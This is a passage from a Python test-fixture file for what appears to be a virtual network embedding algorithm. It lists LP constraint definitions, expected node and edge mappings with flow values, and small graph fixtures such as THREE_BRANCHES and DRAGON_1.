frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "v")), )), # i2, v, i2 -> i4 ("node_mapping_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i2','i4')]_comm_index[i4_v__i6_u]", ( (-1.0, "source_var", (('i2', 'i4'), frozenset([("i4", "v"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "v")), )), ("node_mapping_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i2','i4')]_comm_index[i4_v__i6_w]", ( (-1.0, "source_var", (('i2', 'i4'), frozenset([("i4", "v"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "v")), )), ("node_mapping_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i2','i4')]_comm_index[i4_w__i6_u]", ( (-1.0, "source_var", (('i2', 'i4'), frozenset([("i4", "w"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "v")), )), ("node_mapping_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i2','i4')]_comm_index[i4_w__i6_w]", ( (-1.0, "source_var", (('i2', 'i4'), frozenset([("i4", "w"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "v")), )), # i2, v, i2 -> i5 ("node_mapping_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i2','i5')]_comm_index[i5_u__i6_u]", ( (-1.0, "source_var", (('i2', 'i5'), frozenset([("i5", "u"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "v")), )), ("node_mapping_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i2','i5')]_comm_index[i5_u__i6_w]", ( (-1.0, "source_var", (('i2', 'i5'), frozenset([("i5", "u"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "v")), )), ("node_mapping_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i2','i5')]_comm_index[i5_v__i6_u]", ( (-1.0, "source_var", (('i2', 'i5'), frozenset([("i5", "v"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "v")), )), ("node_mapping_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i2','i5')]_comm_index[i5_v__i6_w]", ( (-1.0, "source_var", (('i2', 'i5'), frozenset([("i5", "v"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "v")), )), # i3, u, i1 -> i3 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i1','i3')]_comm_index[i4_v__i5_u__i6_u]_bag[i4_i5_i6]", ( (-1.0, "sink_var", (('i1', 'i3'), frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i1','i3')]_comm_index[i4_v__i5_u__i6_w]_bag[i4_i5_i6]", ( (-1.0, "sink_var", (('i1', 'i3'), frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i1','i3')]_comm_index[i4_v__i5_v__i6_u]_bag[i4_i5_i6]", ( (-1.0, "sink_var", (('i1', 'i3'), frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i1','i3')]_comm_index[i4_v__i5_v__i6_w]_bag[i4_i5_i6]", ( (-1.0, "sink_var", (('i1', 'i3'), frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i1','i3')]_comm_index[i4_w__i5_u__i6_u]_bag[i4_i5_i6]", ( (-1.0, "sink_var", (('i1', 'i3'), frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i1','i3')]_comm_index[i4_w__i5_u__i6_w]_bag[i4_i5_i6]", ( (-1.0, "sink_var", (('i1', 'i3'), frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i1','i3')]_comm_index[i4_w__i5_v__i6_u]_bag[i4_i5_i6]", ( (-1.0, "sink_var", (('i1', 'i3'), frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i1','i3')]_comm_index[i4_w__i5_v__i6_w]_bag[i4_i5_i6]", ( (-1.0, "sink_var", (('i1', 'i3'), frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "u")), )), # i3, u, i3 -> i4 ("node_mapping_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i3','i4')]_comm_index[i4_v__i6_u]", ( (-1.0, "source_var", (('i3', 'i4'), frozenset([("i4", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i3','i4')]_comm_index[i4_v__i6_w]", ( (-1.0, "source_var", (('i3', 'i4'), frozenset([("i4", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i3','i4')]_comm_index[i4_w__i6_u]", ( (-1.0, "source_var", (('i3', 'i4'), frozenset([("i4", "w"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i3','i4')]_comm_index[i4_w__i6_w]", ( (-1.0, "source_var", (('i3', 'i4'), frozenset([("i4", "w"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "u")), )), # i3, u, i3 -> i5 ("node_mapping_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i3','i5')]_comm_index[i5_u__i6_u]", ( (-1.0, "source_var", (('i3', 'i5'), frozenset([("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i3','i5')]_comm_index[i5_u__i6_w]", ( (-1.0, "source_var", (('i3', 'i5'), frozenset([("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i3','i5')]_comm_index[i5_v__i6_u]", ( (-1.0, "source_var", (('i3', 'i5'), frozenset([("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i3','i5')]_comm_index[i5_v__i6_w]", ( (-1.0, "source_var", (('i3', 'i5'), frozenset([("i5", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "u")), )), # i4, v, i2 -> i4 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i4]_snode[v]_vedge[('i2','i4')]_comm_index[i6_u]_bag[i6]", ( (-1.0, "sink_var", (('i2', 'i4'), frozenset([("i4", "v"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i4", frozenset([("i6", "u")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i4]_snode[v]_vedge[('i2','i4')]_comm_index[i6_w]_bag[i6]", ( (-1.0, "sink_var", (('i2', 'i4'), frozenset([("i4", "v"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i4", frozenset([("i6", "w")]), "v")), )), # i4, w, i2 -> i4 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i4]_snode[w]_vedge[('i2','i4')]_comm_index[i6_u]_bag[i6]", ( (-1.0, "sink_var", (('i2', 'i4'), frozenset([("i4", "w"), ("i6", "u")]), "w")), (1.0, "node_mapping_var", ("i4", frozenset([("i6", "u")]), "w")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i4]_snode[w]_vedge[('i2','i4')]_comm_index[i6_w]_bag[i6]", ( (-1.0, "sink_var", (('i2', 'i4'), frozenset([("i4", "w"), ("i6", "w")]), "w")), (1.0, "node_mapping_var", ("i4", frozenset([("i6", "w")]), "w")), )), # i4, v, i3 -> i4 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i4]_snode[v]_vedge[('i3','i4')]_comm_index[i6_u]_bag[i6]", ( (-1.0, "sink_var", (('i3', 'i4'), frozenset([("i4", "v"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i4", frozenset([("i6", "u")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i4]_snode[v]_vedge[('i3','i4')]_comm_index[i6_w]_bag[i6]", ( (-1.0, "sink_var", (('i3', 'i4'), frozenset([("i4", "v"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i4", frozenset([("i6", "w")]), "v")), )), # i4, w, i3 -> i4 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i4]_snode[w]_vedge[('i3','i4')]_comm_index[i6_u]_bag[i6]", ( (-1.0, "sink_var", (('i3', 'i4'), frozenset([("i4", "w"), ("i6", "u")]), "w")), (1.0, "node_mapping_var", ("i4", frozenset([("i6", "u")]), "w")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i4]_snode[w]_vedge[('i3','i4')]_comm_index[i6_w]_bag[i6]", ( (-1.0, "sink_var", (('i3', 'i4'), frozenset([("i4", "w"), ("i6", "w")]), "w")), (1.0, "node_mapping_var", ("i4", frozenset([("i6", "w")]), "w")), )), # i4, v, i4 -> i6 ("node_mapping_req[{req_name}]_vnode[i4]_snode[v]_vedge[('i4','i6')]_comm_index[i6_u]", ( (-1.0, "source_var", (('i4', 'i6'), frozenset([("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i4", frozenset([("i6", "u")]), "v")), )), ("node_mapping_req[{req_name}]_vnode[i4]_snode[v]_vedge[('i4','i6')]_comm_index[i6_w]", ( (-1.0, "source_var", (('i4', 'i6'), frozenset([("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i4", frozenset([("i6", "w")]), "v")), )), # i4, w, i4 -> i6 ("node_mapping_req[{req_name}]_vnode[i4]_snode[w]_vedge[('i4','i6')]_comm_index[i6_u]", ( (-1.0, "source_var", (('i4', 'i6'), frozenset([("i6", "u")]), "w")), (1.0, "node_mapping_var", ("i4", frozenset([("i6", "u")]), "w")), )), ("node_mapping_req[{req_name}]_vnode[i4]_snode[w]_vedge[('i4','i6')]_comm_index[i6_w]", ( (-1.0, "source_var", (('i4', 'i6'), frozenset([("i6", "w")]), "w")), (1.0, "node_mapping_var", ("i4", frozenset([("i6", "w")]), "w")), )), # i5, u, i2 -> i5 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i5]_snode[u]_vedge[('i2','i5')]_comm_index[i6_u]_bag[i6]", ( (-1.0, "sink_var", (('i2', 'i5'), frozenset([("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i5", frozenset([("i6", "u")]), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i5]_snode[u]_vedge[('i2','i5')]_comm_index[i6_w]_bag[i6]", ( (-1.0, "sink_var", (('i2', 'i5'), frozenset([("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i5", frozenset([("i6", "w")]), "u")), )), # i5, v, i2 -> i5 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i5]_snode[v]_vedge[('i2','i5')]_comm_index[i6_u]_bag[i6]", ( (-1.0, "sink_var", (('i2', 'i5'), frozenset([("i5", "v"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i5", frozenset([("i6", "u")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i5]_snode[v]_vedge[('i2','i5')]_comm_index[i6_w]_bag[i6]", ( (-1.0, "sink_var", (('i2', 'i5'), frozenset([("i5", "v"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i5", frozenset([("i6", "w")]), "v")), )), # i5, u, i3 -> i5 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i5]_snode[u]_vedge[('i3','i5')]_comm_index[i6_u]_bag[i6]", ( (-1.0, "sink_var", (('i3', 'i5'), frozenset([("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i5", frozenset([("i6", "u")]), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i5]_snode[u]_vedge[('i3','i5')]_comm_index[i6_w]_bag[i6]", ( (-1.0, "sink_var", (('i3', 'i5'), frozenset([("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i5", frozenset([("i6", "w")]), "u")), )), # i5, v, i3 -> i5 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i5]_snode[v]_vedge[('i3','i5')]_comm_index[i6_u]_bag[i6]", ( (-1.0, "sink_var", (('i3', 'i5'), frozenset([("i5", "v"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i5", frozenset([("i6", "u")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i5]_snode[v]_vedge[('i3','i5')]_comm_index[i6_w]_bag[i6]", ( (-1.0, "sink_var", (('i3', 'i5'), frozenset([("i5", "v"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i5", frozenset([("i6", "w")]), "v")), )), # i5, u, i5 -> i6 ("node_mapping_req[{req_name}]_vnode[i5]_snode[u]_vedge[('i5','i6')]_comm_index[i6_u]", ( (-1.0, "source_var", (('i5', 'i6'), frozenset([("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i5", frozenset([("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i5]_snode[u]_vedge[('i5','i6')]_comm_index[i6_w]", ( (-1.0, "source_var", (('i5', 'i6'), frozenset([("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i5", frozenset([("i6", "w")]), "u")), )), # i5, v, i5 -> i6 ("node_mapping_req[{req_name}]_vnode[i5]_snode[v]_vedge[('i5','i6')]_comm_index[i6_u]", ( (-1.0, "source_var", (('i5', 'i6'), frozenset([("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i5", frozenset([("i6", "u")]), "v")), )), ("node_mapping_req[{req_name}]_vnode[i5]_snode[v]_vedge[('i5','i6')]_comm_index[i6_w]", ( (-1.0, "source_var", (('i5', 'i6'), frozenset([("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i5", frozenset([("i6", "w")]), "v")), )), # i6, u, i4 -> i6 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i6]_snode[u]_vedge[('i4','i6')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i4', 'i6'), frozenset([("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i6", frozenset(), "u")), )), # i6, w, i4 -> i6 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i6]_snode[w]_vedge[('i4','i6')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i4', 'i6'), frozenset([("i6", "w")]), "w")), (1.0, "node_mapping_var", ("i6", frozenset(), "w")), )), # i6, u, i5 -> i6 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i6]_snode[u]_vedge[('i5','i6')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i5', 'i6'), frozenset([("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i6", frozenset(), "u")), )), # i6, w, i5 -> i6 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i6]_snode[w]_vedge[('i5','i6')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i5', 'i6'), frozenset([("i6", "w")]), "w")), (1.0, "node_mapping_var", ("i6", frozenset(), "w")), )), } }, "mappings": [ { "flow": 0.125, "expected": { "nodes": { "i1": "u", "i2": "v", "i3": "u", "i4": "w", "i5": "v", "i6": "u", }, "edges": { ("i1", "i2"): [("u", "v")], ("i1", "i3"): [], ("i2", "i4"): [("v", "w")], ("i2", "i5"): [], ("i3", "i4"): [("u", "w")], ("i3", "i5"): [("u", "w"), ("w", "v")], ("i4", "i6"): [("w", "u")], ("i5", "i6"): [("v", "u")], }, }, "variables": { ("node_mapping_var", "i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u"), ("node_mapping_var", "i2", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "v"), ("node_mapping_var", "i3", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u"), ("node_mapping_var", "i4", frozenset([("i6", "u")]), "w"), ("node_mapping_var", "i5", frozenset([("i6", "u")]), "v"), ("node_mapping_var", "i6", frozenset(), "u"), ("source_var", ("i1", "i2"), frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u"), ("edge_var", ("i1", "i2"), frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), ("u", "v")), ("sink_var", ("i1", "i2"), frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "v"), ("source_var", ("i1", "i3"), frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u"), ("sink_var", ("i1", "i3"), frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u"), ("source_var", ("i2", "i4"), frozenset([("i4", "w"), ("i6", "u")]), "v"), ("edge_var", ("i2", "i4"), frozenset([("i4", "w"), ("i6", "u")]), ("v", "w")), ("sink_var", ("i2", "i4"), frozenset([("i4", "w"), ("i6", "u")]), "w"), ("source_var", ("i2", "i5"), frozenset([("i5", "v"), ("i6", "u")]), "v"), ("sink_var", ("i2", "i5"), frozenset([("i5", "v"), ("i6", "u")]), "v"), ("source_var", ("i3", "i4"), frozenset([("i4", "w"), ("i6", "u")]), "u"), ("edge_var", ("i3", "i4"), frozenset([("i4", "w"), ("i6", "u")]), ("u", "w")), ("sink_var", ("i3", "i4"), frozenset([("i4", "w"), ("i6", "u")]), "w"), ("source_var", ("i3", "i5"), frozenset([("i5", "v"), ("i6", "u")]), "u"), ("edge_var", ("i3", "i5"), frozenset([("i5", "v"), ("i6", "u")]), ("u", "w")), ("edge_var", ("i3", "i5"), frozenset([("i5", "v"), ("i6", "u")]), ("w", "v")), ("sink_var", ("i3", "i5"), frozenset([("i5", "v"), ("i6", "u")]), "v"), ("source_var", ("i4", "i6"), frozenset([("i6", "u")]), "w"), ("edge_var", ("i4", "i6"), frozenset([("i6", "u")]), ("w", "u")), ("sink_var", ("i4", "i6"), frozenset([("i6", "u")]), "u"), ("source_var", ("i5", "i6"), frozenset([("i6", "u")]), "v"), ("edge_var", ("i5", "i6"), frozenset([("i6", "u")]), ("v", "u")), ("sink_var", ("i5", "i6"), frozenset([("i6", "u")]), "u"), } }, { "flow": 0.25, "expected": { "nodes": { "i1": "u", "i2": "v", "i3": "u", "i4": "v", "i5": "u", "i6": "u", }, "edges": { ("i1", "i2"): [("u", "v")], ("i1", "i3"): [], ("i2", "i4"): [], ("i2", "i5"): [("v", "u")], ("i3", "i4"): [("u", "v")], ("i3", "i5"): [], ("i4", "i6"): [("v", "u")], ("i5", "i6"): [], }, }, "variables": { ("node_mapping_var", "i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u"), ("node_mapping_var", "i2", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "v"), ("node_mapping_var", "i3", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u"), ("node_mapping_var", "i4", frozenset([("i6", "u")]), "v"), ("node_mapping_var", "i5", frozenset([("i6", "u")]), "u"), ("node_mapping_var", "i6", frozenset(), "u"), ("source_var", ("i1", "i2"), frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u"), ("edge_var", ("i1", "i2"), frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), ("u", "v")), ("sink_var", ("i1", "i2"), frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "v"), ("source_var", ("i1", "i3"), frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u"), ("sink_var", ("i1", "i3"), frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u"), ("source_var", ("i2", "i4"), frozenset([("i4", "v"), ("i6", "u")]), "v"), ("sink_var", ("i2", "i4"), frozenset([("i4", "v"), ("i6", "u")]), "v"), ("source_var", ("i2", "i5"), frozenset([("i5", "u"), ("i6", "u")]), "v"), ("edge_var", ("i2", "i5"), frozenset([("i5", "u"), ("i6", "u")]), ("v", "u")), ("sink_var", ("i2", "i5"), frozenset([("i5", "u"), ("i6", "u")]), "u"), ("source_var", ("i3", "i4"), frozenset([("i4", "v"), ("i6", "u")]), "u"), ("edge_var", ("i3", "i4"), frozenset([("i4", "v"), ("i6", "u")]), ("u", "v")), ("sink_var", ("i3", "i4"), frozenset([("i4", "v"), ("i6", "u")]), "v"), ("source_var", ("i3", "i5"), frozenset([("i5", "u"), ("i6", "u")]), "u"), ("sink_var", ("i3", "i5"), frozenset([("i5", "u"), ("i6", "u")]), "u"), ("source_var", ("i4", "i6"), frozenset([("i6", "u")]), "v"), ("edge_var", ("i4", "i6"), frozenset([("i6", "u")]), ("v", "u")), ("sink_var", ("i4", "i6"), frozenset([("i6", "u")]), "u"), ("source_var", ("i5", "i6"), frozenset([("i6", "u")]), "u"), ("sink_var", ("i5", "i6"), frozenset([("i6", "u")]), "u"), } }, # This is the same as above, except (i3, i4) -> [(u, w), (w, v)] instead of [(u, v)] { "flow": 0.5, "expected": { "nodes": { "i1": "u", "i2": "v", "i3": "u", "i4": "v", "i5": "u", "i6": "u", }, "edges": { ("i1", "i2"): [("u", "v")], ("i1", "i3"): [], ("i2", "i4"): [], ("i2", "i5"): [("v", "u")], ("i3", "i4"): [("u", "w"), ("w", "v")], ("i3", "i5"): [], ("i4", "i6"): [("v", "u")], ("i5", "i6"): [], }, }, "variables": { ("node_mapping_var", "i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u"), ("node_mapping_var", "i2", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "v"), ("node_mapping_var", "i3", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u"), ("node_mapping_var", "i4", frozenset([("i6", "u")]), "v"), ("node_mapping_var", "i5", frozenset([("i6", "u")]), "u"), ("node_mapping_var", "i6", frozenset(), "u"), ("source_var", ("i1", "i2"), frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u"), ("edge_var", ("i1", "i2"), frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), ("u", "v")), ("sink_var", ("i1", "i2"), frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "v"), ("source_var", ("i1", "i3"), frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u"), ("sink_var", ("i1", "i3"), frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u"), ("source_var", ("i2", "i4"), frozenset([("i4", "v"), ("i6", "u")]), "v"), ("sink_var", ("i2", "i4"), frozenset([("i4", "v"), ("i6", "u")]), "v"), ("source_var", ("i2", "i5"), frozenset([("i5", "u"), ("i6", "u")]), "v"), ("edge_var", ("i2", "i5"), frozenset([("i5", "u"), ("i6", "u")]), ("v", "u")), ("sink_var", ("i2", "i5"), frozenset([("i5", "u"), ("i6", "u")]), "u"), ("source_var", ("i3", "i4"), frozenset([("i4", "v"), ("i6", "u")]), "u"), ("edge_var", ("i3", "i4"), frozenset([("i4", "v"), ("i6", "u")]), ("u", "w")), ("edge_var", ("i3", "i4"), frozenset([("i4", "v"), ("i6", "u")]), ("w", "v")), ("sink_var", ("i3", "i4"), frozenset([("i4", "v"), ("i6", "u")]), "v"), ("source_var", ("i3", "i5"), frozenset([("i5", "u"), ("i6", "u")]), "u"), ("sink_var", ("i3", "i5"), frozenset([("i5", "u"), ("i6", "u")]), "u"), ("source_var", ("i4", "i6"), frozenset([("i6", "u")]), "v"), ("edge_var", ("i4", "i6"), frozenset([("i6", "u")]), ("v", "u")), ("sink_var", ("i4", "i6"), frozenset([("i6", "u")]), "u"), ("source_var", ("i5", "i6"), frozenset([("i6", "u")]), "u"), ("sink_var", ("i5", "i6"), frozenset([("i6", "u")]), "u"), } } ] } THREE_BRANCHES = { "tags": set(), "nodes": [ "i1", "i2", "i3", "i4", "i5" ], "edges": [ ("i1", "i2"), ("i1", "i3"), ("i1", "i4"), ("i2", "i5"), ("i3", "i5"), ("i4", "i5"), ], "labels": { "i1": {"i5"}, "i2": {"i5"}, "i3": {"i5"}, "i4": {"i5"}, "i5": {"i5"}, } } DRAGON_1 = { "tags": {"dragon", "bags", "multiple_labels", "decomposition"}, # note: we only use this graph to test decomposition of unembedded request! "nodes": [ "i1", "i2", "i3", "i4", "i5", "i6" ], "edges": [ ("i1", "i2"), ("i1", "i3"), ("i1", "i4"), ("i1", "i5"), ("i2", "i4"), ("i2", "i6"), ("i3", "i5"), ("i3", "i6"), ], "labels": { "i1": {"i4", "i5", "i6"}, "i2": {"i4", "i6"}, "i3": {"i5", "i6"}, "i4": {"i4"}, "i5": {"i5"}, "i6": {"i6"}, }, "bags": { "i1": {frozenset(["i4", "i5", "i6"]): {("i1", "i2"), ("i1", "i3"), ("i1", "i4"), ("i1", "i5")}}, "i2": {frozenset(["i4"]): {("i2", "i4")}, frozenset(["i6"]): {("i2", "i6")}}, "i3": {frozenset(["i5"]): {("i3", "i5")}, frozenset(["i6"]): {("i3", "i6")}}, "i4": {frozenset(): set()}, "i5": {frozenset(): set()}, "i6": {frozenset(): set()}, }, "assumed_root": "i1", "ignore_bfs": True, "mappings": [] } DRAGON_2 = { "tags": {"dragon", "bags", "multiple_labels", "node_mapping_constraints", "decomposition"}, "nodes": [ "i1", "i2", "i3", "i4", "i5", "i6" ], "edges": [ ("i1", "i2"), ("i1", "i3"), ("i1", "i4"), ("i1", "i5"), ("i1", "i6"), ("i2", "i4"), ("i2", "i6"), ("i3", "i5"), ("i3", "i6"), ], "labels": { "i1": 